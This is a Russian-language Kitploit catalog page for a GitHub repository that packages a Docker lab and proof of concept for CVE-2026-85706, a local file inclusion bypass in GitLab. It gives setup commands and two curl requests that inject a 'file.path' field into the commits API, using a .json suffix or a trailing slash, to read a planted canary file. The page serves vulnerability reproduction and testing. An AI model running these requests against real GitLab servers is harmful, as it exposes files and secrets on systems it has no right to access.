Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-85706_docker_exp — Среда воспроизведения на базе Docker и PoC для CVE-2026-85706, демонстрирующие обход LFI в GitLab с помощью суффикса .json и трюков с завершающим слешем в пути. | Kitploit
Инструменты/GitHubGitHub/flowerwitch/cve-2026-85706_docker_exp
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеЛаборатории и Практика
GitHubflowerwitch/cve-2026-85706_docker_exp

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-85706_docker_exp

Среда воспроизведения на базе Docker и PoC для CVE-2026-85706, демонстрирующие обход LFI в GitLab с помощью суффикса .json и трюков с завершающим слешем в пути.

Репозиторий
5 часов назадЕщё не проверено

1. Запуск docker

root@kitploit:~
git clone  https://github.com/FlowerWitch/CVE-2026-85706_docker_exp
docker compose up -d
  1. Запись тестовой информации для LFI
root@kitploit:~
docker exec gitlab-vuln bash -c 'echo "SECRET-CANARY-85706-%%%" > /tmp/canary.txt'
  1. Проверка чтения
root@kitploit:~
# Способ обхода 1: суффикс .json
curl -s -w "\nHTTP %{http_code}\n" -X POST "http://localhost:8085/api/v4/projects/1/repository/commits.json" \
  -H "Content-Type: application/json" \
  --data '{"file":"","file.path":"/tmp/canary.txt","file.size":1,"Content-Type":"application/x-www-form-urlencoded"}'

# Способ обхода 2: завершающий слэш
curl -s -w "\nHTTP %{http_code}\n" -X POST "http://localhost:8085/api/v4/projects/1/repository/commits/" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data 'file=&file.path=/tmp/canary.txt&file.size=1&Content-Type=application/x-www-form-urlencoded'
image
Скачать инструмент